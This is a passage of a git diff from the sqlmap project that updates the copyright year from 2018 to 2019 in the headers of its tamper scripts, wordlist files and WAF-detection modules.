7a6c6569724..0c4ee3e41d0 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index f87b8a098b9..af358f58b9a 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index f5b8e904b61..57cc2327208 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index 3e434638328..5cc28a6308a 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py index a34b61929cb..301945f4f6f 100644 --- a/tamper/overlongutf8more.py +++ b/tamper/overlongutf8more.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/percentage.py b/tamper/percentage.py index 182ddc52c33..71259fd88f2 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index 113315b9b3c..acc800022a8 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index bc85826f8ff..99e0a144255 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/randomcase.py b/tamper/randomcase.py index 3a01b216ef9..2e9fb575b1a 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index 9890deed3db..1e9c7815afa 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/sp_password.py b/tamper/sp_password.py index 540d3647a5e..0f2f813a49b 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2comment.py b/tamper/space2comment.py index 1f570fc91a3..2f06c5b2d3c 100644 --- a/tamper/space2comment.py +++ b/tamper/space2comment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2dash.py b/tamper/space2dash.py index 525e051a268..4ce7423f6c1 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2hash.py b/tamper/space2hash.py index 56d5e06e5eb..7acf8f6dcfc 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py index e3644b6d956..3dd9a7f02f7 100644 --- a/tamper/space2morecomment.py +++ b/tamper/space2morecomment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index 77169fb96d9..c722553b7d1 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index 8424ec1ca71..37998f6eb22 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index 0e489c8f2ff..d139f6b0cf8 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index 0216e2d6ed5..c28dc97dc41 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index 67e72538b47..1394d14d4a0 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2plus.py b/tamper/space2plus.py index d8ef65efdaf..06868cf3379 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index 0234b65caed..d8cd9423998 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index aad77f1722d..6cac245b917 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index 46e00447eb4..6d24acb062a 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index 84746e9eb2f..9cea29e05a4 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/uppercase.py b/tamper/uppercase.py index 71aeba794cf..faec80704ba 100644 --- a/tamper/uppercase.py +++ b/tamper/uppercase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/varnish.py b/tamper/varnish.py index b0b020e7ebd..d37f4ae2f58 100644 --- a/tamper/varnish.py +++ b/tamper/varnish.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index 31524e60855..af27d4cbe50 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index d8480814724..4f926344228 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index b0c8d85959e..88845f8a6f4 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/txt/common-columns.txt b/txt/common-columns.txt index 8efec7578e2..ad302d3b302 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission id diff --git a/txt/common-outputs.txt b/txt/common-outputs.txt index e4f89aafe9b..874bd83e27f 100644 --- a/txt/common-outputs.txt +++ b/txt/common-outputs.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission [Banners] diff --git a/txt/common-tables.txt b/txt/common-tables.txt index 184ee14d7a1..0067d971675 100644 --- a/txt/common-tables.txt +++ b/txt/common-tables.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission users diff --git a/txt/keywords.txt b/txt/keywords.txt index f044faa26da..0dbc046b00c 100644 --- a/txt/keywords.txt +++ b/txt/keywords.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) diff --git a/txt/user-agents.txt b/txt/user-agents.txt index 602e9d3c3d1..2e0b12bf76a 100644 --- a/txt/user-agents.txt +++ b/txt/user-agents.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission # Opera diff --git a/waf/360.py b/waf/360.py index 07b01603a9b..25c61f75a3d 100644 --- a/waf/360.py +++ b/waf/360.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/__init__.py b/waf/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/waf/__init__.py +++ b/waf/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/aesecure.py b/waf/aesecure.py index 18b87bfaf14..4c85b8b5d8a 100644 --- a/waf/aesecure.py +++ b/waf/aesecure.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/airlock.py b/waf/airlock.py index 6f76073d9a8..fe6b9db6eb4 100644 --- a/waf/airlock.py +++ b/waf/airlock.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/anquanbao.py b/waf/anquanbao.py index 42f608c7bae..d0b3d36e6b5 100644 --- a/waf/anquanbao.py +++ b/waf/anquanbao.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/approach.py b/waf/approach.py index 1077e0b673d..80e9d563662 100644 --- a/waf/approach.py +++ b/waf/approach.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/armor.py b/waf/armor.py index 1ca7fc542e8..266c94ab8e1 100644 --- a/waf/armor.py +++ b/waf/armor.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/asm.py b/waf/asm.py index 9bfb31371c4..6f07d5909a7 100644 --- a/waf/asm.py +++ b/waf/asm.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/aws.py b/waf/aws.py index aa561629964..694ad589f0b 100644 --- a/waf/aws.py +++ b/waf/aws.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/baidu.py b/waf/baidu.py index b9dbcd89436..50e5542cad4 100644 --- a/waf/baidu.py +++ b/waf/baidu.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/barracuda.py b/waf/barracuda.py index daad0577175..0e769a65b17 100644 --- a/waf/barracuda.py +++ b/waf/barracuda.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/bigip.py b/waf/bigip.py index 9cc248a8003..ff1d5dc7833 100644 --- a/waf/bigip.py +++ b/waf/bigip.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/binarysec.py b/waf/binarysec.py index dd98a527088..31905d1de51 100644 --- a/waf/binarysec.py +++ b/waf/binarysec.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/blockdos.py b/waf/blockdos.py index af2ea4c8f5f..fe430ad70c7 100644 --- a/waf/blockdos.py +++ b/waf/blockdos.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/bluedon.py b/waf/bluedon.py index 678f5e423e6..c38b025a6e2 100644 --- a/waf/bluedon.py +++ b/waf/bluedon.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/chinacache.py b/waf/chinacache.py index d4d2d5aaebb..caf223851b2 100644 --- a/waf/chinacache.py +++ b/waf/chinacache.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/waf/ciscoacexml.py b/waf/ciscoacexml.py index 277a27f4e11..ec6d2c44e66 100644 --- a/waf/ciscoacexml.py +++ b/waf/ciscoacexml.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/cloudbric.py b/waf/cloudbric.py index 94963232934..6f2931f55e2 100644 --- a/waf/cloudbric.py +++ b/waf/cloudbric.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/cloudflare.py b/waf/cloudflare.py index 249b4b8b528..2112eba936f 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/cloudfront.py b/waf/cloudfront.py index 462f909acf3..081c9750209 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/comodo.py b/waf/comodo.py index f37902f85d3..6fd2c114a12 100644 --- a/waf/comodo.py +++ b/waf/comodo.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/crawlprotect.py b/waf/crawlprotect.py index ed1698f961b..669c927ec5c 100644 --- a/waf/crawlprotect.py +++ b/waf/crawlprotect.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/datapower.py b/waf/datapower.py index 3e292c2cd93..b1af70a8f6a 100644 --- a/waf/datapower.py +++ b/waf/datapower.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/denyall.py b/waf/denyall.py index 807136f2688..6da57b63d6e 100644 --- a/waf/denyall.py +++ b/waf/denyall.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/distil.py b/waf/distil.py index 064425dcf5e..4747e17291e 100644 --- a/waf/distil.py +++ b/waf/distil.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/dosarrest.py b/waf/dosarrest.py index 42b14a3721a..5d9666689b8 100644 --- a/waf/dosarrest.py +++ b/waf/dosarrest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/dotdefender.py b/waf/dotdefender.py index 2a49b0def41..cf9c2d01c19 100644 --- a/waf/dotdefender.py +++ b/waf/dotdefender.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/edgecast.py b/waf/edgecast.py index ad789b0793f..444ea35d4af 100644 --- a/waf/edgecast.py +++ b/waf/edgecast.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/expressionengine.py b/waf/expressionengine.py index 33edcd11ecf..7b3c9b47e8d 100644 --- a/waf/expressionengine.py +++ b/waf/expressionengine.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/fortiweb.py b/waf/fortiweb.py index 0305df73307..68619bcae07 100644 --- a/waf/fortiweb.py +++ b/waf/fortiweb.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/generic.py b/waf/generic.py index 4be618d8813..31335e1f91e 100644 --- a/waf/generic.py +++ b/waf/generic.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/hyperguard.py b/waf/hyperguard.py index 78aa1c7a98a..619e6f04fad 100644 --- a/waf/hyperguard.py +++ b/waf/hyperguard.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/incapsula.py b/waf/incapsula.py index c5e299057cb..2d52644560b 100644 --- a/waf/incapsula.py +++ b/waf/incapsula.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/isaserver.py b/waf/isaserver.py index df83c6ff099..2f4f11137f5 100644 --- a/waf/isaserver.py +++ b/waf/isaserver.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/jiasule.py b/waf/jiasule.py index 20aff285cd7..465cdcf75f2 100644 --- a/waf/jiasule.py +++ b/waf/jiasule.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/knownsec.py b/waf/knownsec.py index 3372a6b2218..fc6f629b864 100644 --- a/waf/knownsec.py +++ b/waf/knownsec.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/kona.py b/waf/kona.py index f24702411d0..be124a92c18 100644 --- a/waf/kona.py +++ b/waf/kona.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/modsecurity.py b/waf/modsecurity.py index 64d36264177..d5d6d8ff41f 100644 --- a/waf/modsecurity.py +++ b/waf/modsecurity.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/naxsi.py b/waf/naxsi.py index 7fb42a11858..494d91db72c 100644 --- a/waf/naxsi.py +++ b/waf/naxsi.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/netcontinuum.py b/waf/netcontinuum.py index f899a2eeb73..2a5aaf1b7c0 100644 --- a/waf/netcontinuum.py +++ b/waf/netcontinuum.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/netscaler.py b/waf/netscaler.py index 52e6bc0490f..7a8ac59685f 100644 --- a/waf/netscaler.py +++ b/waf/netscaler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/newdefend.py b/waf/newdefend.py index 9153e8f1999..c96208a36b0 100644 --- a/waf/newdefend.py +++ b/waf/newdefend.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/nsfocus.py b/waf/nsfocus.py index 758ba293bad..b5c95804e71 100644 --- a/waf/nsfocus.py +++ b/waf/nsfocus.py @@ -1,7 +1,7 @@ #!/usr/bin/env 